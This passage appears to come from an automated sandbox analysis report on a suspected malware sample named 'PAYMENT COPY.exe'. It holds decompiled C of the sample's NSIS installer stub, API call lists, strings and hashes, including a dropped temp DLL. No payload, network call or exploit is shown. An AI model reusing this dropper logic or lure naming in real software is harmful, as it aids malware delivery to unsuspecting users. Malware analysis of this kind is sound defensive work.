                                                                  								GetClassInfoA(0, _t82, 0x7a2720);
                                                                  								 *0x7a2744 = _t82;
                                                                  								 *0x4092ac = 0x32;
                                                                  								RegisterClassA(0x7a2720);
                                                                  							}
                                                                  							_t42 = DialogBoxParamA( *0x7a2f80,  *0x7a2760 + 0x00000069 & 0x0000ffff, 0, E004038BF, 0);
                                                                  							E00401410(5);
                                                                  							return _t42;
                                                                  						}
                                                                  						L22:
                                                                  						_t34 = 2;
                                                                  						return _t34;
                                                                  					} else {
                                                                  						_t75 =  *0x7a2f80;
                                                                  						 *0x7a2734 = _t28;
                                                                  						_v20 = 0x624e5f;
                                                                  						 *0x7a2724 = E00401000;
                                                                  						 *0x7a2730 =  *0x7a2f80;
                                                                  						 *0x7a2744 =  &_v20;
                                                                  						if(RegisterClassA(0x7a2720) == 0) {
                                                                  							L33:
                                                                  							__eflags = 0;
                                                                  							return 0;
                                                                  						}
                                                                  						_t12 =  &_v16; // 0x624e5f
                                                                  						SystemParametersInfoA(0x30, 0, _t12, 0);
                                                                  						 *0x79f560 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2f80, 0);
                                                                  						goto L21;
                                                                  					}
                                                                  				} else {
                                                                  					_t75 =  *(_t80 + 0x48);
                                                                  					if(_t75 == 0) {
                                                                  						goto L16;
                                                                  					}
                                                                  					_t78 = 0x7a1f20;
                                                                  					E004058B3( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x7a2fb8, 0x7a1f20);
                                                                  					_t61 =  *0x7a1f20; // 0x52
                                                                  					if(_t61 == 0) {
                                                                  						goto L16;
                                                                  					}
                                                                  					if(_t61 == 0x22) {
                                                                  						_t78 = 0x7a1f21;
                                                                  						 *((char*)(E004054F7(0x7a1f21, 0x22))) = 0;
                                                                  					}
                                                                  					_t63 = lstrlenA(_t78) + _t78 - 4;
                                                                  					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) {
                                                                  						L15:
                                                                  						E004059BF(_t84, E004054CC(_t78));
                                                                  						goto L16;
                                                                  					} else {
                                                                  						_t67 = GetFileAttributesA(_t78);
                                                                  						if(_t67 == 0xffffffff) {
                                                                  							L14:
                                                                  							E00405513(_t78);
                                                                  							goto L15;
                                                                  						}
                                                                  						_t96 = _t67 & 0x00000010;
                                                                  						if((_t67 & 0x00000010) != 0) {
                                                                  							goto L15;
                                                                  						}
                                                                  						goto L14;
                                                                  					}
                                                                  				}
                                                                  			}



























                                                                  0x0040352c
                                                                  0x0040353d
                                                                  0x00403544
                                                                  0x00403546
                                                                  0x0040355a
                                                                  0x0040355f
                                                                  0x00403575
                                                                  0x0040357a
                                                                  0x00403580
                                                                  0x00403592
                                                                  0x00403592
                                                                  0x0040359d
                                                                  0x00403548
                                                                  0x00403553
                                                                  0x00403553
                                                                  0x004035a2
                                                                  0x004035ac
                                                                  0x004035b5
                                                                  0x004035c1
                                                                  0x00403647
                                                                  0x0040364f
                                                                  0x00403651
                                                                  0x00403657
                                                                  0x00403658
                                                                  0x00403658
                                                                  0x0040366e
                                                                  0x00403674
                                                                  0x00403682
                                                                  0x00403711
                                                                  0x00403719
                                                                  0x00403723
                                                                  0x00403728
                                                                  0x0040372e
                                                                  0x004037c0
                                                                  0x004037c5
                                                                  0x004037c7
                                                                  0x004037e3
                                                                  0x00000000
                                                                  0x004037e3
                                                                  0x004037c9
                                                                  0x004037cf
                                                                  0x004037d7
                                                                  0x004037d7
                                                                  0x00000000
                                                                  0x004037cf
                                                                  0x0040373c
                                                                  0x00403748
                                                                  0x0040374e
                                                                  0x00403750
                                                                  0x00403752
                                                                  0x00403755
                                                                  0x0040375e
                                                                  0x0040375e
                                                                  0x00403766
                                                                  0x0040376e
                                                                  0x00403770
                                                                  0x00403772
                                                                  0x00403777
                                                                  0x0040377d
                                                                  0x00403780
                                                                  0x00403786
                                                                  0x0040378d
                                                                  0x0040378d
                                                                  0x004037ac
                                                                  0x004037b6
                                                                  0x00000000
                                                                  0x004037bb
                                                                  0x0040371b
                                                                  0x0040371d
                                                                  0x00000000
                                                                  0x00403688
                                                                  0x00403688
                                                                  0x0040368e
                                                                  0x00403698
                                                                  0x004036a0
                                                                  0x004036aa
                                                                  0x004036b0
                                                                  0x004036be
                                                                  0x004037e8
                                                                  0x004037e8
                                                                  0x00000000
                                                                  0x004037e8
                                                                  0x004036c4
                                                                  0x004036cd
                                                                  0x0040370c
                                                                  0x00000000
                                                                  0x0040370c
                                                                  0x004035c7
                                                                  0x004035c7
                                                                  0x004035cc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004035d6
                                                                  0x004035e5
                                                                  0x004035ea
                                                                  0x004035f1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004035f5
                                                                  0x004035f7
                                                                  0x00403604
                                                                  0x00403604
                                                                  0x0040360c
                                                                  0x00403612
                                                                  0x0040363a
                                                                  0x00403642
                                                                  0x00000000
                                                                  0x00403624
                                                                  0x00403625
                                                                  0x0040362e
                                                                  0x00403634
                                                                  0x00403635
                                                                  0x00000000
                                                                  0x00403635
                                                                  0x00403630
                                                                  0x00403632
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403632
                                                                  0x00403612

                                                                  APIs
                                                                    • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                                                    • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                                                    • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                                                  • lstrcatA.KERNEL32(1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 0040359D
                                                                  • lstrlenA.KERNEL32(007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,00000000), ref: 00403607
                                                                  • lstrcmpiA.KERNEL32(?,.exe,007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage), ref: 0040361A
                                                                  • GetFileAttributesA.KERNEL32(007A1F20), ref: 00403625
                                                                  • LoadImageA.USER32 ref: 0040366E
                                                                  • RegisterClassA.USER32 ref: 004036B5
                                                                    • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                                                  • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036CD
                                                                  • CreateWindowExA.USER32 ref: 00403706
                                                                  • ShowWindow.USER32(00000005,00000000), ref: 0040373C
                                                                  • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040374E
                                                                  • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040375E
                                                                  • GetClassInfoA.USER32 ref: 0040376E
                                                                  • GetClassInfoA.USER32 ref: 0040377D
                                                                  • RegisterClassA.USER32 ref: 0040378D
                                                                  • DialogBoxParamA.USER32 ref: 004037AC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: 'z$"C:\Users\user\Desktop\PAYMENT COPY.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$KERNEL32.dll$Locale$RichEd20.dll$RichEdit20A$_Nb
                                                                  • API String ID: 914957316-105500400
                                                                  • Opcode ID: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
                                                                  • Instruction ID: 4e9c7f181e94f196de7c88ece58cce9fa533c44585b571451200f5668265d8f3
                                                                  • Opcode Fuzzy Hash: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
                                                                  • Instruction Fuzzy Hash: 5361C2B1504240BFE720AF699D45E2B3AACEB85759B00457FF941B22E2D73D9D018B2E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 81%
                                                                  			E00402C37(void* __eflags, signed int _a4) {
                                                                  				struct HWND__* _v8;
                                                                  				long _v12;
                                                                  				long _v16;
                                                                  				void* _v20;
                                                                  				intOrPtr _v24;
                                                                  				long _v28;
                                                                  				intOrPtr _v32;
                                                                  				intOrPtr _v36;
                                                                  				intOrPtr _v40;
                                                                  				intOrPtr _v44;
                                                                  				signed int _v48;
                                                                  				long _t52;
                                                                  				signed int _t56;
                                                                  				void* _t62;
                                                                  				intOrPtr* _t66;
                                                                  				long _t67;
                                                                  				signed int _t73;
                                                                  				signed int _t78;
                                                                  				signed int _t79;
                                                                  				long _t84;
                                                                  				intOrPtr _t89;
                                                                  				void* _t91;
                                                                  				signed int _t92;
                                                                  				signed int _t93;
                                                                  				signed int _t94;
                                                                  				signed int _t95;
                                                                  				void* _t97;
                                                                  				signed int _t101;
                                                                  				void* _t102;
                                                                  
                                                                  				_v8 = 0;
                                                                  				_t52 = GetTickCount();
                                                                  				_v16 = 0;
                                                                  				_v12 = 0;
                                                                  				_t100 = "C:\\Users\\engineer\\Desktop";
                                                                  				_t97 = _t52 + 0x3e8;
                                                                  				GetModuleFileNameA( *0x7a2f80, "C:\\Users\\engineer\\Desktop", 0x400);
                                                                  				_t91 = E00405690(_t100, 0x80000000, 3);
                                                                  				_v20 = _t91;
                                                                  				 *0x409020 = _t91;
                                                                  				if(_t91 == 0xffffffff) {
                                                                  					return "Error launching installer";
                                                                  				}
                                                                  				E00405513(_t100);
                                                                  				_t56 = GetFileSize(_t91, 0);
                                                                  				__eflags = _t56;
                                                                  				 *0x79d938 = _t56;
                                                                  				_t101 = _t56;
                                                                  				if(_t56 <= 0) {
                                                                  					L27:
                                                                  					__eflags =  *0x7a2f8c;
                                                                  					if( *0x7a2f8c == 0) {
                                                                  						goto L33;
                                                                  					}
                                                                  					__eflags = _v12;
                                                                  					if(_v12 == 0) {
                                                                  						L31:
                                                                  						_t102 = GlobalAlloc(0x40, _v28);
                                                                  						E004030FF( *0x7a2f8c + 0x1c);
                                                                  						_push(_v28);
                                                                  						_push(_t102);
                                                                  						_push(0);
                                                                  						_push(0xffffffff);
                                                                  						_t62 = E00402EBD();
                                                                  						__eflags = _t62 - _v28;
                                                                  						if(_t62 == _v28) {
                                                                  							__eflags = _a4 & 0x00000002;
                                                                  							 *0x7a2f88 = _t102;
                                                                  							if((_a4 & 0x00000002) != 0) {
                                                                  								 *_t102 =  *_t102 | 0x00000008;
                                                                  								__eflags =  *_t102;
                                                                  							}
                                                                  							__eflags = _v48 & 0x00000001;
                                                                  							 *0x7a3020 =  *_t102 & 0x00000018;
                                                                  							 *0x7a2f90 =  *_t102;
                                                                  							if((_v48 & 0x00000001) != 0) {
                                                                  								 *0x7a2f94 =  *0x7a2f94 + 1;
                                                                  								__eflags =  *0x7a2f94;
                                                                  							}
                                                                  							_t49 = _t102 + 0x44; // 0x44
                                                                  							_t66 = _t49;
                                                                  							_t93 = 8;
                                                                  							do {
                                                                  								_t66 = _t66 - 8;
                                                                  								 *_t66 =  *_t66 + _t102;
                                                                  								_t93 = _t93 - 1;
                                                                  								__eflags = _t93;
                                                                  							} while (_t93 != 0);
                                                                  							_t67 = SetFilePointer(_v20, 0, 0, 1); // executed
                                                                  							 *(_t102 + 0x3c) = _t67;
                                                                  							E00405670(0x7a2fa0, _t102 + 4, 0x40);
                                                                  							__eflags = 0;
                                                                  							return 0;
                                                                  						}
                                                                  						GlobalFree(_t102);
                                                                  						goto L33;
                                                                  					}
                                                                  					E004030FF( *0x789930);
                                                                  					_t73 = E004030CD( &_v12, 4); // executed
                                                                  					__eflags = _t73;
                                                                  					if(_t73 == 0) {
                                                                  						goto L33;
                                                                  					}
                                                                  					__eflags = _v16 - _v12;
                                                                  					if(_v16 != _v12) {
                                                                  						goto L33;
                                                                  					}
                                                                  					goto L31;
                                                                  				} else {
                                                                  					do {
                                                                  						_t92 = _t101;
                                                                  						asm("sbb eax, eax");
                                                                  						_t78 = ( ~( *0x7a2f8c) & 0x00007e00) + 0x200;
                                                                  						__eflags = _t101 - _t78;
                                                                  						if(_t101 >= _t78) {
                                                                  							_t92 = _t78;
                                                                  						}
                                                                  						_t79 = E004030CD(0x795938, _t92); // executed
                                                                  						__eflags = _t79;
                                                                  						if(_t79 == 0) {
                                                                  							__eflags = _v8;
                                                                  							if(_v8 != 0) {
                                                                  								DestroyWindow(_v8);
                                                                  							}
                                                                  							L33:
                                                                  							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
                                                                  						}
                                                                  						__eflags =  *0x7a2f8c;
                                                                  						if( *0x7a2f8c != 0) {
                                                                  							__eflags = _a4 & 0x00000002;
                                                                  							if((_a4 & 0x00000002) == 0) {
                                                                  								__eflags = _v8;
                                                                  								if(_v8 == 0) {
                                                                  									_t84 = GetTickCount();
                                                                  									__eflags = _t84 - _t97;
                                                                  									if(_t84 > _t97) {
                                                                  										_v8 = CreateDialogParamA( *0x7a2f80, 0x6f, 0, E00402BAB, "verifying installer: %d%%");
                                                                  									}
                                                                  								} else {
                                                                  									E00405CFC(0);
                                                                  								}
                                                                  							}
                                                                  							goto L22;
                                                                  						}
                                                                  						E00405670( &_v48, 0x795938, 0x1c);
                                                                  						_t94 = _v48;
                                                                  						__eflags = _t94 & 0xfffffff0;
                                                                  						if((_t94 & 0xfffffff0) != 0) {
                                                                  							goto L22;
                                                                  						}
                                                                  						__eflags = _v44 - 0xdeadbeef;
                                                                  						if(_v44 != 0xdeadbeef) {
                                                                  							goto L22;
                                                                  						}
                                                                  						__eflags = _v32 - 0x74736e49;
                                                                  						if(_v32 != 0x74736e49) {
                                                                  							goto L22;
                                                                  						}
                                                                  						__eflags = _v36 - 0x74666f73;
                                                                  						if(_v36 != 0x74666f73) {
                                                                  							goto L22;
                                                                  						}
                                                                  						__eflags = _v40 - 0x6c6c754e;
                                                                  						if(_v40 != 0x6c6c754e) {
                                                                  							goto L22;
                                                                  						}
                                                                  						_t89 = _v24;
                                                                  						__eflags = _t89 - _t101;
                                                                  						if(_t89 > _t101) {
                                                                  							goto L33;
                                                                  						}
                                                                  						_a4 = _a4 | _t94;
                                                                  						_t95 =  *0x789930; // 0x32765
                                                                  						__eflags = _a4 & 0x00000008;
                                                                  						 *0x7a2f8c = _t95;
                                                                  						if((_a4 & 0x00000008) != 0) {
                                                                  							L15:
                                                                  							_v12 = _v12 + 1;
                                                                  							_t24 = _t89 - 4; // 0x1c
                                                                  							_t101 = _t24;
                                                                  							__eflags = _t92 - _t101;
                                                                  							if(_t92 > _t101) {
                                                                  								_t92 = _t101;
                                                                  							}
                                                                  							goto L22;
                                                                  						}
                                                                  						__eflags = _a4 & 0x00000004;
                                                                  						if((_a4 & 0x00000004) != 0) {
                                                                  							break;
                                                                  						}
                                                                  						goto L15;
                                                                  						L22:
                                                                  						__eflags = _t101 -  *0x79d938; // 0x32769
                                                                  						if(__eflags < 0) {
                                                                  							_v16 = E00405D2F(_v16, 0x795938, _t92);
                                                                  						}
                                                                  						 *0x789930 =  *0x789930 + _t92;
                                                                  						_t101 = _t101 - _t92;
                                                                  						__eflags = _t101;
                                                                  					} while (_t101 > 0);
                                                                  					__eflags = _v8;
                                                                  					if(_v8 != 0) {
                                                                  						DestroyWindow(_v8);
                                                                  					}
                                                                  					goto L27;
                                                                  				}
                                                                  			}
































                                                                  0x00402c42
                                                                  0x00402c45
                                                                  0x00402c4b
                                                                  0x00402c4e
                                                                  0x00402c51
                                                                  0x00402c64
                                                                  0x00402c6a
                                                                  0x00402c7d
                                                                  0x00402c82
                                                                  0x00402c85
                                                                  0x00402c8b
                                                                  0x00000000
                                                                  0x00402c8d
                                                                  0x00402c98
                                                                  0x00402ca0
                                                                  0x00402ca6
                                                                  0x00402ca8
                                                                  0x00402cad
                                                                  0x00402caf
                                                                  0x00402dde
                                                                  0x00402de0
                                                                  0x00402de6
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402de8
                                                                  0x00402deb
                                                                  0x00402e0f
                                                                  0x00402e1a
                                                                  0x00402e25
                                                                  0x00402e2a
                                                                  0x00402e2d
                                                                  0x00402e2e
                                                                  0x00402e2f
                                                                  0x00402e31
                                                                  0x00402e36
                                                                  0x00402e39
                                                                  0x00402e5a
                                                                  0x00402e5e
                                                                  0x00402e64
                                                                  0x00402e66
                                                                  0x00402e66
                                                                  0x00402e66
                                                                  0x00402e6e
                                                                  0x00402e72
                                                                  0x00402e79
                                                                  0x00402e7e
                                                                  0x00402e80
                                                                  0x00402e80
                                                                  0x00402e80
                                                                  0x00402e88
                                                                  0x00402e88
                                                                  0x00402e8b
                                                                  0x00402e8c
                                                                  0x00402e8c
                                                                  0x00402e8f
                                                                  0x00402e91
                                                                  0x00402e91
                                                                  0x00402e91
                                                                  0x00402e9b
                                                                  0x00402ea1
                                                                  0x00402eaf
                                                                  0x00402eb4
                                                                  0x00000000
                                                                  0x00402eb4
                                                                  0x00402e3c
                                                                  0x00000000
                                                                  0x00402e3c
                                                                  0x00402df3
                                                                  0x00402dfe
                                                                  0x00402e03
                                                                  0x00402e05
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402e0a
                                                                  0x00402e0d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402cb5
                                                                  0x00402cb5
                                                                  0x00402cba
                                                                  0x00402cbe
                                                                  0x00402cc5
                                                                  0x00402cca
                                                                  0x00402ccc
                                                                  0x00402cce
                                                                  0x00402cce
                                                                  0x00402cd6
                                                                  0x00402cdb
                                                                  0x00402cdd
                                                                  0x00402e49
                                                                  0x00402e4d
                                                                  0x00402e52
                                                                  0x00402e52
                                                                  0x00402e42
                                                                  0x00000000
                                                                  0x00402e42
                                                                  0x00402ce5
                                                                  0x00402ceb
                                                                  0x00402d6c
                                                                  0x00402d70
                                                                  0x00402d72
                                                                  0x00402d75
                                                                  0x00402d7f
                                                                  0x00402d85
                                                                  0x00402d87
                                                                  0x00402da3
                                                                  0x00402da3
                                                                  0x00402d77
                                                                  0x00402d78
                                                                  0x00402d78
                                                                  0x00402d75
                                                                  0x00000000
                                                                  0x00402d70
                                                                  0x00402cf8
                                                                  0x00402cfd
                                                                  0x00402d00
                                                                  0x00402d06
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402d0c
                                                                  0x00402d13
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402d19
                                                                  0x00402d20
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402d26
                                                                  0x00402d2d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402d2f
                                                                  0x00402d36
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402d38
                                                                  0x00402d3b
                                                                  0x00402d3d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402d43
                                                                  0x00402d46
                                                                  0x00402d4c
                                                                  0x00402d50
                                                                  0x00402d56
                                                                  0x00402d5e
                                                                  0x00402d5e
                                                                  0x00402d61
                                                                  0x00402d61
                                                                  0x00402d64
                                                                  0x00402d66
                                                                  0x00402d68
                                                                  0x00402d68
                                                                  0x00000000
                                                                  0x00402d66
                                                                  0x00402d58
                                                                  0x00402d5c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402da6
                                                                  0x00402da6
                                                                  0x00402dac
                                                                  0x00402dbc
                                                                  0x00402dbc
                                                                  0x00402dbf
                                                                  0x00402dc5
                                                                  0x00402dc7
                                                                  0x00402dc7
                                                                  0x00402dcf
                                                                  0x00402dd3
                                                                  0x00402dd8
                                                                  0x00402dd8
                                                                  0x00000000
                                                                  0x00402dd3

                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00402C45
                                                                  • GetModuleFileNameA.KERNEL32(C:\Users\user\Desktop,00000400,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402C6A
                                                                    • Part of subcall function 00405690: GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
                                                                    • Part of subcall function 00405690: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
                                                                  • GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402CA0
                                                                  • DestroyWindow.USER32(00000000,00795938,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402DD8
                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402E14
                                                                  Strings
                                                                  • Inst, xrefs: 00402D19
                                                                  • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E42
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                                                  • Error launching installer, xrefs: 00402C8D
                                                                  • Null, xrefs: 00402D2F
                                                                  • "C:\Users\user\Desktop\PAYMENT COPY.exe" , xrefs: 00402C41
                                                                  • soft, xrefs: 00402D26
                                                                  • C:\Users\user\Desktop, xrefs: 00402C51, 00402C5B, 00402C77, 00402C97
                                                                  • verifying installer: %d%%, xrefs: 00402D89
                                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402C37
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
                                                                  • String ID: "C:\Users\user\Desktop\PAYMENT COPY.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
                                                                  • API String ID: 2181728824-3468678391
                                                                  • Opcode ID: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                                                  • Instruction ID: 2bc3342fd27a022da09e110317cf5b670322b105189d6b48e3606e9cef6b214d
                                                                  • Opcode Fuzzy Hash: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                                                  • Instruction Fuzzy Hash: 8561CE30900215EBDB219F64DE49B9EBBB4BF45714F20813AF900B22E2D7BC9D418B9C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 57%
                                                                  			E0040179D(FILETIME* __ebx, void* __eflags) {
                                                                  				void* _t33;
                                                                  				void* _t41;
                                                                  				void* _t43;
                                                                  				long _t49;
                                                                  				long _t62;
                                                                  				signed char _t63;
                                                                  				long _t64;
                                                                  				void* _t66;
                                                                  				long _t72;
                                                                  				FILETIME* _t73;
                                                                  				FILETIME* _t77;
                                                                  				signed int _t79;
                                                                  				void* _t82;
                                                                  				CHAR* _t84;
                                                                  				void* _t87;
                                                                  
                                                                  				_t77 = __ebx;
                                                                  				_t84 = E00402A9A(0x31);
                                                                  				 *(_t87 - 0x34) = _t84;
                                                                  				 *(_t87 + 8) =  *(_t87 - 0x24) & 0x00000007;
                                                                  				_t33 = E00405538(_t84);
                                                                  				_push(_t84);
                                                                  				if(_t33 == 0) {
                                                                  					lstrcatA(E004054CC(E004059BF(0x409c18, "C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
                                                                  				} else {
                                                                  					_push(0x409c18);
                                                                  					E004059BF();
                                                                  				}
                                                                  				E00405BFB(0x409c18);
                                                                  				while(1) {
                                                                  					__eflags =  *(_t87 + 8) - 3;
                                                                  					if( *(_t87 + 8) >= 3) {
                                                                  						_t66 = E00405C94(0x409c18);
                                                                  						_t79 = 0;
                                                                  						__eflags = _t66 - _t77;
                                                                  						if(_t66 != _t77) {
                                                                  							_t73 = _t66 + 0x14;
                                                                  							__eflags = _t73;
                                                                  							_t79 = CompareFileTime(_t73, _t87 - 0x18);
                                                                  						}
                                                                  						asm("sbb eax, eax");
                                                                  						_t72 =  ~(( *(_t87 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                  						__eflags = _t72;
                                                                  						 *(_t87 + 8) = _t72;
                                                                  					}
                                                                  					__eflags =  *(_t87 + 8) - _t77;
                                                                  					if( *(_t87 + 8) == _t77) {
                                                                  						_t63 = GetFileAttributesA(0x409c18); // executed
                                                                  						_t64 = _t63 & 0x000000fe;
                                                                  						__eflags = _t64;
                                                                  						SetFileAttributesA(0x409c18, _t64); // executed
                                                                  					}
                                                                  					__eflags =  *(_t87 + 8) - 1;
                                                                  					_t41 = E00405690(0x409c18, 0x40000000, (0 |  *(_t87 + 8) != 0x00000001) + 1);
                                                                  					__eflags = _t41 - 0xffffffff;
                                                                  					 *(_t87 - 8) = _t41;
                                                                  					if(_t41 != 0xffffffff) {
                                                                  						break;
                                                                  					}
                                                                  					__eflags =  *(_t87 + 8) - _t77;
                                                                  					if( *(_t87 + 8) != _t77) {
                                                                  						E00404D62(0xffffffe2,  *(_t87 - 0x34));
                                                                  						__eflags =  *(_t87 + 8) - 2;
                                                                  						if(__eflags == 0) {
                                                                  							 *((intOrPtr*)(_t87 - 4)) = 1;
                                                                  						}
                                                                  						L31:
                                                                  						 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t87 - 4));
                                                                  						__eflags =  *0x7a3008;
                                                                  						goto L32;
                                                                  					} else {
                                                                  						E004059BF(0x40a418, 0x7a4000);
                                                                  						E004059BF(0x7a4000, 0x409c18);
                                                                  						E004059E1(_t77, 0x40a418, 0x409c18, "C:\Users\engineer\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll",  *((intOrPtr*)(_t87 - 0x10)));
                                                                  						E004059BF(0x7a4000, 0x40a418);
                                                                  						_t62 = E004052BF("C:\Users\engineer\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll",  *(_t87 - 0x24) >> 3) - 4;
                                                                  						__eflags = _t62;
                                                                  						if(_t62 == 0) {
                                                                  							continue;
                                                                  						} else {
                                                                  							__eflags = _t62 == 1;
                                                                  							if(_t62 == 1) {
                                                                  								 *0x7a3008 =  *0x7a3008 + 1;
                                                                  								L32:
                                                                  								_t49 = 0;
                                                                  								__eflags = 0;
                                                                  							} else {
                                                                  								_push(0x409c18);
                                                                  								_push(0xfffffffa);
                                                                  								E00404D62();
                                                                  								L29:
                                                                  								_t49 = 0x7fffffff;
